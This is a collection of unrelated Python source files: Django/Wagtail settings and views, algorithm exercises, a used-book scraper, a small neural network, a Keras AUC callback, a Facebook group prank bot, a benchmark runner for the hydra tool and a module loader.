'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n\n 'wagtail.wagtailcore.middleware.SiteMiddleware',\n\n 'wagtail.wagtailredirects.middleware.RedirectMiddleware',\n)\n\n# Name and email addresses of recipients\nADMINS = (\n ('Tech-urgent', 'tech-urgent@springload.co.nz'),\n)\n\n# Default from address for CMS auto email messages (logs, errors..)\nSERVER_EMAIL = 'errors@madewithwagtail.org'\n\n# Default from address for CMS email messages to users (forgot password etc..)\nDEFAULT_FROM_EMAIL = '%s@madewithwagtail.org' % SITE_NAME\n\nROOT_URLCONF = SITE_NAME + '.urls'\nWSGI_APPLICATION = SITE_NAME + '.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'madewithwagtail',\n 'USER': 'postgres',\n 'HOST': '', # Set to empty string for localhost.\n 'PORT': '', # Set to empty string for default.\n 'CONN_MAX_AGE': 600, # number of seconds database connections should persist for\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-gb'\nTIME_ZONE = 'Pacific/Auckland'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nDATE_FORMAT = 'j F Y'\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_ROOT = join(PROJECT_ROOT, 'static')\nSTATIC_URL = '/static/'\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n)\n\nSTATICFILES_DIRS = (\n join(DJANGO_ROOT, 'static'),\n)\n\nMEDIA_ROOT = join(PROJECT_ROOT, 'media')\nMEDIA_URL = '/media/'\n\n# Django compressor settings\n# http://django-compressor.readthedocs.org/en/latest/settings/\n\nCOMPRESS_PRECOMPILERS = (\n ('text/x-scss', 'django_libsass.SassCompiler'),\n)\n\n# Template configuration\nCONTEXT_PROCESSORS = [\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.request',\n 'core.context_processors.baseurl',\n 'core.context_processors.google_analytics',\n 'core.context_processors.api_companies_endpoint',\n 'django.contrib.messages.context_processors.messages',\n]\n\n# Wagtail settings\n\nLOGIN_URL = 'wagtailadmin_login'\nLOGIN_REDIRECT_URL = 'wagtailadmin_home'\n\n# Wagtailgmaps settings\n\nWAGTAIL_ADDRESS_MAP_CENTER = 'Wellington, New Zealand'\nWAGTAIL_ADDRESS_MAP_ZOOM = 8\n\n# List of web hook URLs we push Slack messages to on page publish.\n# URLs should stay secret - define them in local.py\nPUBLISH_SLACK_HOOKS = []\n\nTAGGIT_CASE_INSENSITIVE = True\n\n# REST framework\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAuthenticatedOrReadOnly',),\n 'PAGINATE_BY': None,\n}\n","sub_path":"madewithwagtail/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"107052963","text":"from GeeksForGeeks.Tree.BinaryTree import BinaryTree\n\n\"\"\"\nRemove all nodes which don’t lie in any path with sum>= k\n\nGiven a binary tree, a complete path is defined as a path from root to a leaf.\n The sum of all nodes on that path is defined as the sum of that path. Given a number K,\n you have to remove (prune the tree) all nodes which don’t lie in any path with sum>=k.\n\nNote: A node can be part of multiple paths. So we have to delete it only in case when all paths from\nit have sum less than K.\n\nConsider the following Binary Tree\n 1\n / \\\n 2 3\n / \\ / \\\n 4 5 6 7\n / \\ / /\n8 9 12 10\n / \\ \\\n 13 14 11\n /\n 15\n\nFor input k = 20, the tree should be changed to following\n(Nodes with values 6 and 8 are deleted)\n 1\n / \\\n 2 3\n / \\ \\\n 4 5 7\n \\ / /\n 9 12 10\n / \\ \\\n 13 14 11\n /\n 15\n\nFor input k = 45, the tree should be changed to following.\n 1\n /\n 2\n /\n 4\n \\\n 9\n \\\n 14\n /\n 15\n\"\"\"\n\ndef remove_nodes(node,_sum):\n if not node :\n return\n else :\n node.left = remove_nodes(node.left, _sum - node.data)\n node.right = remove_nodes(node.right, _sum - node.data)\n\n if not node.left and not node.right :\n if node.data < _sum :\n node = None\n return node\n\nif __name__ =='__main__':\n bt = BinaryTree()\n for i in range(1,20):\n bt.add_node(i)\n remove_nodes(bt.root,25)\n bt.print_levelorder()\n\n\n\n\n","sub_path":"GeeksForGeeks/Tree/RemoveNodesWithSumK.py","file_name":"RemoveNodesWithSumK.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"391707722","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .forms import UserRegistration\n\ndef register(request):\n\n\tif request.method == 'POST':\n\t\tform = UserRegistration(request.POST)\n\t\t\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tusername = form.cleaned_data.get('username')\n\t\t\tmessages.success(request, f'Account created for {username}!')\n\t\t\treturn redirect('login')\n\telse :\n\t\tform = UserRegistration()\n\n\n\tcontext = {\n\t\t'title': 'Register'\n\t}\n\treturn render(request, 'users/register.html', {'form': form})\n\n# CHANGED TO DJANGO.CONTRIB.AUTH.AUTH_VIEWS\ndef login(request):\n\tcontext = {\n\t\t'title': 'Login'\n\t}\n\tform = UserRegistration()\n\treturn render(request, 'users/login.html', {'form': form})\n\n\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47618554","text":"import sympy\nimport curtis\n\n\nclass CurtisG2(curtis.Curtis):\n # variables for the torus\n v = []\n # \"primed\" variables\n vv = []\n # \"double primed\" variables\n vvv = []\n\n def __init__(self, t):\n super().__init__(t)\n cmd = self.group.var.com_variables_l(\"v\", [\"a0\", \"b0\", \"c0\", \"d0\"])\n exec(cmd[0])\n exec(cmd[1])\n\n v = self.v\n self.tori = [\n [[\"t\", 0, v[0]], [\"t\", 1, v[1]]],\n [[\"t\", 1, v[2]]],\n [],\n [[\"t\", 0, v[3]]]\n ]\n\n cmd = self.group.var.com_variables_l(\"vv\", [\"a1\", \"b1\", \"c1\", \"d1\"])\n exec(cmd[0])\n exec(cmd[1])\n\n vv = self.vv\n self.tori2 = [\n [[\"t\", 0, vv[0]], [\"t\", 1, vv[1]]],\n [[\"t\", 1, vv[2]]],\n [],\n [[\"t\", 0, vv[3]]]\n ]\n\n cmd = self.group.var.com_variables_l(\"vvv\", [\"a2\", \"b2\", \"c2\", \"d2\"])\n exec(cmd[0])\n exec(cmd[1])\n\n vvv = self.vvv\n self.tori3 = [\n [[\"t\", 0, vvv[0]], [\"t\", 1, vvv[1]]],\n [[\"t\", 1, vvv[2]]],\n [],\n [[\"t\", 0, vvv[3]]]\n ]\n","sub_path":"curtisg2.py","file_name":"curtisg2.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"477532111","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.listings, name='listings'),\n path('', views.listing, name='listing'),\n path('search', views.search, name='search'),\n path('contact', views.contact, name='contact'),\n\n path('add', views.ListingCreate.as_view(), name='listing-add'),\n path('/update', views.ListingUpdate.as_view(), name='listing-update'),\n path('/delete', views.ListingDelete.as_view(), name='listing-delete'),\n]","sub_path":"listings/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"573858913","text":"from urllib.request import urlopen\nfrom urllib import parse\nfrom bs4 import BeautifulSoup\n#from selenium import webdriver\nimport time\nimport os\n\n\nclass CatchDogUsedBooks():\n baseDomain=\"\"\n baseUrl={\"ALADIN-USEDOFFLINE\":\"http://m.aladin.co.kr/m/msearch.aspx?SearchTarget=UsedStore&SearchWord={keyword}\",\n \"ALADIN-USEDONLINE\":\"http://m.aladin.co.kr/m/msearch.aspx?SearchTarget=Used&SearchWord={keyword}\"}\n dtRlt=dict()\n def __init__(self):\n #self.d=webdriver.PhantomJS()\n pass\n \n def gogogo(self,kword,target):\n self.baseDomain=self.baseUrl[target][:self.baseUrl[target].index('kr')+2]\n url=self.baseUrl[target].format(keyword=parse.quote(kword))\n try:\n html=urlopen(url)\n bs=BeautifulSoup(html,'html.parser')\n #tables=bs.find('div',{'id':'Search3_Result'})\n boxs=bs.findAll('div',{'class':'browse_list_box'})\n dtBook=dict()\n dtBStore=dict()\n ltBattr=list()\n for bx in boxs:\n dtBStore.clear()\n ltBattr.clear()\n \n trs=bx.findAll('tr')\n ltBattr.append(trs[0].find('span',{'class':'b_book_t'}).getText())\n ltBattr.append(trs[0].findAll('li')[1].getText())\n #lis=trs[0].findAll('li')\n #for li in lis:\n # bAttr.append(li.getText())\n\n #ttl=trs[0].find('ul').getText()\n ttl=' | '.join(ltBattr)\n if len(trs)>1:\n ass=trs[1].find_all('a')\n for a in ass:\n dtBStore[a.getText()]=self.baseDomain+'/'+a['href']\n\n dtBook[ttl]=dtBStore.copy()\n \n \n except Exception as e:\n print(\"Error ...\",str(e))\n pass\n \n return dtBook\n \n\n def printResult(self,dtB):\n for a in dtB.keys():\n print(\"[%s] >>> %s\" %(a,','.join(list(dtB[a].keys()))))\n\n return\n \nif __name__=='__main__':\n fpath=os.path.join(\"D:\\\\SOURCE\",\"gitSync\",\"Python\",\"input.txt\")\n kwords=[]\n #with open(fpath,'r') as f:\n # kwords=f.readlines()\n # f.close()\n print(\"input search keyword\")\n t=input()\n kwords.append(t)\n c=CatchDogUsedBooks()\n for k in kwords:\n dt=c.gogogo(k,'ALADIN-USEDOFFLINE')\n c.printResult(dt)\n \n print(\"finished...\")\n print(\"Please any key press for exit\")\n input()\n","sub_path":"CatchDogUsedBooks_input.py","file_name":"CatchDogUsedBooks_input.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"138579675","text":"low_score_number = int(input())\ncurrent_problem_name = str()\nlast_problem_name = 'none'\nscore = int()\ntotal_score = 0\ntest_number = 0\nlow_score_count = 0\nwhile low_score_count < low_score_number:\n last_problem_name = current_problem_name\n current_problem_name = str(input())\n if current_problem_name == 'Enough':\n average_score = total_score / test_number\n print(f'Average score: {average_score:.2f}')\n print(f'Number of problems: {test_number}')\n print(f'Last problem: {last_problem_name}')\n break\n test_number += 1\n grade = int(input())\n total_score += grade\n if grade <= 4:\n low_score_count += 1\n if low_score_count == low_score_number:\n print(f'You need a break, {low_score_count} poor grades.')\n","sub_path":"1_pb_python/pb_python_whle_loop_exercice/exam_preparation.py","file_name":"exam_preparation.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"253893472","text":"import random\nimport time\nimport numpy as np\n\nclass Neuralnet:\n def __init__(self, layers=None, neuralnet=None, parents=None, mutate_prob=None, path=None):\n self.layers = list()\n self.neurons = list()\n self.weights = list()\n random.seed(time.time())\n\n if layers is not None and neuralnet is None and parents is None and path is None:\n #list with amount of neurons as each index\n self.layers = layers\n #list with lists(layers) which contain value of neurons\n self.init_neurons()\n #list with lists(layers) with list with neurons weights for each neuron\n self.init_weights()\n\n self.layers = np.asarray(self.layers)\n self.neurons = np.asarray(self.neurons)\n self.weights = np.asarray(self.weights)\n elif neuralnet is not None and layers is None and parents is None and path is None:\n self.layers = Neuralnet.layers()\n self.neurons = Neuralnet.neurons()\n self.weights = Neuralnet.weights()\n elif parents is not None and layers is None and neuralnet is None and path is None:\n if mutate_prob is None:\n self.evolve(parents, 1000)\n elif mutate_prob is not None:\n self.evolve(parents, mutate_prob)\n elif path is not None and layers is None and neuralnet is None and parents is None:\n self.read_net(path)\n self.layers = np.asarray(self.layers)\n self.neurons = np.asarray(self.neurons)\n self.weights = np.asarray(self.weights)\n else:\n print(\"Error: Check input\")\n\n def init_neurons(self):\n for i in self.layers:\n #adds list with neurons to each layer\n self.neurons.append([x for x in range(i)])\n\n def init_weights(self):\n #goes through each layer, but not the input layer\n for i in range(1,len(self.layers)):\n neurons_in_previous_layer = self.layers[i - 1]\n layersweights = list()\n #goes through each neuron in current layer\n for j in self.neurons[i]:\n weightlist = list()\n #goes through each previous neuron, because thats the amount of weights the current neuron needs\n for k in range(neurons_in_previous_layer):\n #add random weight to weightlist of current neuron\n weightlist.append(random.random() - 0.5)\n layersweights.append(weightlist)\n self.weights.append(layersweights)\n \n def feed_forward(self, inputs, bias=0):\n #put input in first input layer\n self.neurons[0] = inputs\n #go through each layer, but not the input layer\n for i in range(1,len(self.layers)):\n #go through each neuron\n for j in range(len(self.neurons[i])):\n value = bias #bias or something idk\n #go through each previous neuron\n for k in range(len(self.neurons[i - 1])):\n #multiply each weight with corresponding previous neuron and sum all off them\n value += self.weights[i-1][j][k] * self.neurons[i - 1][k]\n #makes the neuron the current value and applies an activation function on it\n self.neurons[i][j] = np.tanh(value) \n #return list of output neurons\n return self.neurons[len(self.neurons) - 1]\n\n #parents = list of 2 nn\n def evolve(self, parents, mutate_prob):\n self.layers = parents[0].layers\n self.neurons = parents[0].neurons\n self.init_weights()\n\n for i in range(len(parents[0].weights)):\n for j in range(len(parents[0].weights[i])):\n for k in range(len(parents[0].weights[i][j])):\n rv = random.randrange(0,2)\n if rv == 0:\n self.weights[i][j][k] = parents[0].weights[i][j][k]\n elif rv == 1:\n self.weights[i][j][k] = parents[1].weights[i][j][k]\n\n self.mutate(mutate_prob)\n\n def mutate(self, chance):\n rv1 = random.randrange(0,chance)\n #i = layers, j = neurons, k = each weight for neuron\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n rv2 = random.randrange(0,chance)\n if rv1 == rv2:\n self.weights[i][j][k] += (random.random() - 0.5)\n elif rv1 + rv2 == chance:\n self.weights[i][j][k] *= -1\n\n def print_net(self):\n print(\"layers: \", self.layers)\n print(\"neurons: \", self.neurons)\n print(\"weights: \", self.weights)\n\n #Writes the amount of layers, writes the amount of neurons in each layer, writes the weights of each layer\n #Individual weights and layers are seperated by '/' layers and weights are divided by '.'\n def save_net(self, path):\n file = open(path, mode='w', encoding='utf-8', newline='')\n for i in self.layers:\n file.write(str(i))\n file.write('/')\n file.write('.')\n for i in range(len(self.weights)):\n for j in range(len(self.weights[i])):\n for k in range(len(self.weights[i][j])):\n file.write(str(self.weights[i][j][k]))\n file.write('/')\n file.close()\n\n def read_net(self, path):\n file = open(path, mode='r', encoding='utf-8', newline='')\n f_data = file.read()\n\n first_dot = 0\n current_neurons_amount = ''\n amount_neurons_prev_layer = 0\n layer_index = 0\n for i in f_data:\n #checks whether end of layer data has been reached\n if i is '.' and first_dot is 0:\n first_dot = 1\n self.init_neurons()\n\n #Read amount of neurons for each layer (layer data)\n if first_dot is 0:\n if i is not '/':\n current_neurons_amount.append(i)\n else:\n self.layers.append(int(current_neurons_amount))\n current_neurons_amount = ''\n \n #Read amount of weights for each layer\n if first_dot is 1:\n amount_neurons_prev_layer = self.layers[layer_index]\n pass\n\n file.close()\n\n\n'''\nNeurons: [\n [1,2,3] -> layer1 (input) with 3 neurons\n [1,2,3,4] -> layer2 with 4 neurons\n [1,2] -> layer3 (output) with 2 neurons\n ]\nItems in first list are the layers, items in second list are the neurons\n\nWeights: [\n [ [1,2,3], [1,2,3], [1,2,3], [1,2,3] ] -> layer2 with 4 neurons -> 1,2,3 represent neurons connection with each input (or previous neuron)\n [ [1,2,3,4], [1,2,3,4] ] -> layer3 (output) with 2 neurons -> 1,2,3,4 represent neurons connection with each input\n ]\nItems in first list are the layers, items in second list are the neurons and items in third list are the connections between that neuron and all previous neurons aka the connection each neuron has\n'''","sub_path":"Neuralnet.py","file_name":"Neuralnet.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"238710758","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 24 12:11:18 2018\n\n@author: weikaiqi\n\"\"\"\n\nfrom keras.callbacks import Callback\nfrom sklearn.metrics import roc_auc_score\n\n# Note: you can't calculate ROC&AUC by mini-batches, you can only calculate it on the end of one epoch\nclass RocAucEvaluation(Callback):\n def __init__(self, training_data=(), validation_data=(), interval=1):\n super(Callback, self).__init__()\n\n self.interval = interval\n self.X , self.y = training_data\n self.X_val, self.y_val = validation_data\n\n def on_epoch_end(self, epoch, logs={}):\n if epoch % self.interval == 0:\n y_pred = self.model.predict(self.X, verbose=0)\n score = roc_auc_score(self.y, y_pred)\n \n y_pred_val = self.model.predict(self.X_val, verbose=0)\n score_val = roc_auc_score(self.y_val, y_pred_val)\n \n print(\"\\n ROC-AUC - epoch: {:d} - train score: {: 6f} - val score: {:.6f}\".format(epoch, score, score_val))\n\n","sub_path":"pylib/KerasAUC.py","file_name":"KerasAUC.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"387228256","text":"import time\r\n\r\nfrom fbchat import log, Client\r\nfrom fbchat.models import *\r\n\r\n\r\nclass PakerBot(Client):\r\n def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):\r\n\r\n if message_object.text == \"!reputacja\" and thread_type == ThreadType.GROUP and thread_id == \"2458017120955707\":\r\n self.send(Message(text=\"Nasi bohaterowie:\\nKrzysztof 9999pkt rep\\nRobert 666 pkt rep\\nKrzysztof 40 pkt rep\\nBronisław 15 pkt rep\"), thread_id=\"2458017120955707\", thread_type=ThreadType.GROUP)\r\n\r\n def onPersonRemoved(self, removed_id, author_id, thread_id, **kwargs):\r\n \r\n if (\r\n removed_id != self.uid\r\n and author_id != self.uid\r\n ):\r\n log.info(\"{} ktoś nam spierdolił. Zaraz go dodam!\".format(removed_id))\r\n self.addUsersToGroup(removed_id, thread_id=thread_id) \r\n self.send(Message(text=\"Nie tym razem byczq\"), thread_id=\"2458017120955707\", thread_type=ThreadType.GROUP)\r\n\r\n#Imiona\r\n\r\n def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):\r\n\r\n if message_object.text == \"rovert\" or message_object.text == \"rupert\" or message_object.text == \"roland\" or message_object.text == \"rower\" and thread_type == ThreadType.GROUP and thread_id == \"2458017120955707\":\r\n self.send(Message(text=\"Dla Ciebie Książe Krwi Królewskiej Robert*\"), thread_id=\"2458017120955707\", thread_type=ThreadType.GROUP)\r\n\r\n def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):\r\n\r\n if message_object.text == \"krzychu\" or message_object.text == \"krzych\" or message_object.text == \"krzysiek\" and thread_type == ThreadType.GROUP and thread_id == \"2458017120955707\":\r\n self.send(Message(text=\"Dla Ciebie Jaśnie Wielmożny Hrabia Krzysztof*\"), thread_id=\"2458017120955707\", thread_type=ThreadType.GROUP)\r\n\r\n def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):\r\n\r\n if message_object.text == \"Gronek\" or message_object.text == \"Bronek\" or message_object.text == \"Broniu\" or message_object.text == \"broniu\" or message_object.text == \"bronek\" or message_object.text == \"gronek\" or message_object.text == \"Groniu\" and thread_type == ThreadType.GROUP and thread_id == \"2458017120955707\":\r\n self.sendLocalImage(\r\n \"gronek2.jpg\",\r\n thread_id=\"2458017120955707\", thread_type=ThreadType.GROUP)\r\n\r\nclient = PakerBot(variable)\r\nclient.listen()\r\n\r\n # and message_object.text == \"!ucieczka\"","sub_path":"pakerbot.py","file_name":"pakerbot.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"316554262","text":"#!/usr/bin/env python3\n\"\"\"\nRun multiple benchmarks consecutively.\nRequired arguments (positional):\n tool: The path to the tool (hydra) executable\n settings: Path to a text file that contains the command line\n arguments for the benchmarks to run. For example, if hydra\n should be called with\n `./bin/hydra -m bball.model -r support_function --setting BoxLinearOptimizationOn`\n then the settings file should contain a line\n `-m bball.model -r support_function --setting BoxLinearOptimizationOn`\n Paths to the model (-m) should be given relative to the settings file.\n Empty lines and lines that start with '#' are ignored.\n output: Path to a file to write the output to. The output will\n be given in csv-format with the measured time, safety result and\n error messages if an error occured.\nOptional arguments:\n -t A time limit in seconds. If the execution of a benchmark\n model takes longer than the given time it will be terminated.\n This is indicated in the output.\n -m A memory limit in megabyte. If the execution of a benchmark\n model uses more space than allowed it will be terminated.\n This is NOT indicated in the output but will cause an error \n in the tool execution and the error message has to be interpreted.\n --verbose Verbose execution: The output of the tool will be printed.\n --benchmark Faster execution: The output is written to a file and analyzed\n after execution is complete. This lowers runtime but disables\n the timeout and verbose option as well as skipping functionality.\n (These arguments are ignored.)\nExample calls:\n (1) `python3 run_hydra.py ../bin/hydra input/settings results.csv -t 1200 -m 16000 --verbose`\n Call for testing models with a timeout of 20min and memout of 16gb with verbose mode.\n (2) `python3 run_hydra.py ../bin/hydra input/settings results.csv --benchmark`\n Call for benchmarking and faster execution. Adding the timeout or verbose option\n will have no effect.\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport subprocess\nimport time\nimport re\nimport csv\nimport json\nimport select\nimport fcntl\nimport resource\nimport tempfile\n\ndef limit_mem(memLimit):\n \"\"\"Limit the memory-usage to memLimit (in MB).\"\"\"\n if memLimit:\n memLimit = memLimit * 1024 * 1024\n resource.setrlimit(\n resource.RLIMIT_AS, (memLimit, resource.RLIM_INFINITY))\n\ndef read_file(fileName):\n \"\"\"Return the lines of the file as a list. Lines that start with\n '#' and empty lines are ignored. Multiple whitespaces are removed\n from lines and lines are stripped.\"\"\"\n with open(fileName, 'r') as f:\n lines = [\" \".join(line.split()) for line in f]\n return list(filter(lambda l: l != '' and not l.startswith('#'), lines))\n\nclass Results(object):\n \"\"\"Stores results from a model execution.\"\"\"\n def __init__(self, modelName, instance=''):\n self.modelName = modelName\n self.instance = instance\n self.startTime = -1\n self.endTime = -1\n self.timeout = False\n self.skipped = False\n self.safetyResult = None\n self.error = False\n self.errorMsg = None\n\n def set_error(self, errorMsg):\n self.error = True\n self.errorMsg = errorMsg.strip()\n\n def get_csv_header():\n h = ['Tool', 'Benchmark ID', 'Instance', 'Verified', 'Time']\n return h\n\n def get_csv_footer():\n f = ['End of HyDRA']\n return f\n\n def to_csv(self):\n line = [\n 'HyDRA',\n self.modelName.replace('.model',''),\n self.instance,\n '1' if self.safetyResult == 'Safe' else '0',\n str(self.endTime - self.startTime) \\\n if self.endTime > 0 and self.startTime > 0 else ''\n ]\n return line\n\n def to_string(self):\n runningTime = str(self.endTime - self.startTime) \\\n if self.endTime > 0 and self.startTime > 0 else ''\n head = self.modelName + \": \"\n body = [\n self.safetyResult or \"No safety result\",\n \"running time: \" + runningTime,\n \"Error: \" + self.errorMsg if self.error else None\n ]\n return head + \", \".join(filter(None, body))\n\nclass Model(object):\n def __init__(self, clString, name=None):\n self.clString = clString\n self.name = name or self._get_name(clString)\n\n def _get_name(self, clString):\n clArgs = clString.split(' ')\n name = os.path.basename(clArgs[clArgs.index('-m')+1])\n return name\n\n def run(self, benchmark, *args, **kwargs):\n \"\"\"Run the model with the given parameters and return the results.\"\"\"\n result = Results(self.name)\n result.startTime = time.time()\n if benchmark:\n print('[+] Running %s.'%self.name)\n self._run_benchmark(result, *args, **kwargs)\n else:\n print('[+] Running %s. Press enter to skip.'%self.name)\n self._run_test(result, *args, **kwargs)\n result.endTime = time.time()\n return result\n\n def _run_test(self, result, tool, timeLimit, memLimit, verbose):\n params = self.get_process_params(tool)\n process = subprocess.Popen(\n params, stdout=subprocess.PIPE, stderr=subprocess.PIPE, \n universal_newlines=True, preexec_fn=lambda: limit_mem(memLimit))\n # Make stdout non-blocking to enable reading during execution (to avoid\n # filling the pipe and losing output), while also checking for timeouts \n # and skips.\n pStdoutFlags = fcntl.fcntl(process.stdout, fcntl.F_GETFL)\n fcntl.fcntl(process.stdout, fcntl.F_SETFL, pStdoutFlags | os.O_NONBLOCK)\n\n while process.poll() is None:\n for line in process.stdout.readlines():\n self._parse_line(result, line, verbose)\n if self._check_skip(result):\n self._stop_run(process)\n print('[+] Skipped %s'%self.name)\n if self._check_timeout(result, timeLimit):\n print('[-] Timeout %s'%self.name)\n self._stop_run(process)\n # Read errors after process is done because stderr usually fits in \n # the pipe.\n errors = process.stderr.readlines()\n if errors:\n print('[-] Errors during execution: ')\n result.set_error(errors[0])\n for line in errors:\n print(line, end='')\n return result\n\n def _run_benchmark(self, result, tool, timeLimit, memLimit, verbose):\n stdoutFile = tempfile.TemporaryFile(mode='w+')\n stderrFile = tempfile.TemporaryFile(mode='w+')\n params = self.get_process_params(tool)\n process = subprocess.Popen(\n params, stdout=stdoutFile, stderr=stderrFile, \n universal_newlines=True, preexec_fn=lambda: limit_mem(memLimit))\n process.wait()\n stdoutFile.seek(0)\n stderrFile.seek(0)\n self._parse_output(result, stdoutFile, stderrFile)\n return result\n\n def _parse_output(self, result, stdoutFile, stderrFile):\n for line in stdoutFile:\n self._parse_line(result, line, False)\n errors = stderrFile.readlines()\n if errors:\n print('[-] Errors during execution: ')\n result.set_error(errors[0])\n for line in errors:\n print(line, end='')\n return result\n\n def get_process_params(self, tool):\n \"\"\"Build subprocess parameters from clString and tool path.\"\"\" \n hydraArgs = self.clString.split(' ')\n cmd = ['stdbuf', '-oL', tool] + hydraArgs\n return cmd\n\n def _stop_run(self, process):\n process.terminate()\n process.wait()\n return True \n\n def _check_skip(self, result):\n \"\"\"Check if enter was pressed to skip execution.\"\"\"\n if select.select([sys.stdin], [], [], 0)[0] != []:\n sys.stdin.readline()\n result.skipped = True\n return True\n else:\n return False\n\n def _check_timeout(self, result, timeLimit):\n if timeLimit is None:\n return False\n elif time.time() - result.startTime > timeLimit:\n result.timeout = True\n return True \n\n def _parse_line(self, result, line, verbose):\n if line.strip() == \"Could not verify safety.\":\n result.safetyResult = 'Unsafe'\n elif line.strip() == \"The model is safe.\":\n result.safetyResult = 'Safe'\n if verbose:\n print(line, end='')\n\ndef get_cli_args():\n parser = argparse.ArgumentParser(\n description='Run the models given in the settings file with the given '+\\\n 'tool and write the results to the output file.',\n epilog='Example call: %(prog)s ../bin/hydra input/settings results.csv '+\\\n '-t 1200 -m 16000 --verbose') \n parser.add_argument(\n 'tool', metavar='path', help='Path to the tool executable')\n parser.add_argument(\n 'settings', metavar='settings-file', \n help='Filename that contains the command line arguments.')\n parser.add_argument(\n 'output', metavar='output-file', \n help='File to write results to (as csv).')\n parser.add_argument(\n '-t', dest='timeLimit', metavar='seconds', type=int, default=None,\n help='Time limit for a single model execution (in seconds).')\n parser.add_argument(\n '-m', dest='memLimit', metavar='megabyte', type=int, default=None,\n help='Memory limit for a single model execution (in mb).')\n parser.add_argument(\n '--verbose', action='store_true', \n help='Write the tool-output to stdout.')\n parser.add_argument(\n '--benchmark', action='store_true',\n help='Option for benchmarking that enables faster execution '+\\\n 'by reading tool output after execution. Disables timeout and '+\\\n 'verbose option as well as skipping models.')\n args = parser.parse_args()\n return args\n\ndef main():\n args = get_cli_args()\n tool = os.path.abspath(os.path.expanduser(args.tool))\n settingsFile = os.path.abspath(os.path.expanduser(args.settings))\n settingsDir = os.path.dirname(settingsFile)\n outputFile = os.path.abspath(os.path.expanduser(args.output))\n os.chdir(settingsDir)\n settingsList = read_file(settingsFile)\n resultList = []\n for s in settingsList:\n m = Model(s)\n result = m.run(args.benchmark, tool, args.timeLimit, \n args.memLimit, args.verbose)\n resultList.append(result) \n csvWriter = csv.writer(open(outputFile, 'w'), delimiter=';')\n #csvWriter.writerow(Results.get_csv_header())\n print(\"Results:\")\n for result in resultList:\n csvWriter.writerow(result.to_csv())\n print(result.to_string())\n #csvWriter.writerow(Results.get_csv_footer())\n\nif __name__=='__main__':\n main()\n","sub_path":"examples/arch21/run_hydra.py","file_name":"run_hydra.py","file_ext":"py","file_size_in_byte":10986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"205465273","text":"\nimport sys, imp\nimport logging\n\nlog = logging.getLogger(__name__)\n\ndef load_module(module_name, path = None):\n \"\"\"Load and return the given module, recursively loading containing packages as necessary.\"\"\"\n if module_name in sys.modules:\n log.debug('module %r already loaded' % module_name)\n return sys.modules[module_name]\n \n spec_components = list(reversed(module_name.split('.')))\n qname_components = []\n mod_chain = []\n while spec_components:\n next_component = spec_components.pop(-1)\n qname_components.append(next_component)\n \n try:\n parent = mod_chain[-1]\n path = parent.__path__\n except IndexError:\n parent = None\n\n # This will raise ImportError if next_component is not found\n # (as one would hope)\n log.debug('find_module({!r},{!r})'.format(next_component,path)) \n (fp, pathname, desc) = imp.find_module(next_component, path)\n \n qname = '.'.join(qname_components)\n try:\n module = imp.load_module(qname, fp, pathname, desc)\n finally:\n try:\n fp.close()\n except AttributeError:\n pass\n \n # make the module appear in sys.modules\n sys.modules[qname] = module\n mod_chain.append(module)\n \n # Make the module appear in the parent module's namespace\n if parent:\n setattr(parent, next_component, module)\n \n log.debug('module %r loaded' % qname)\n\n return 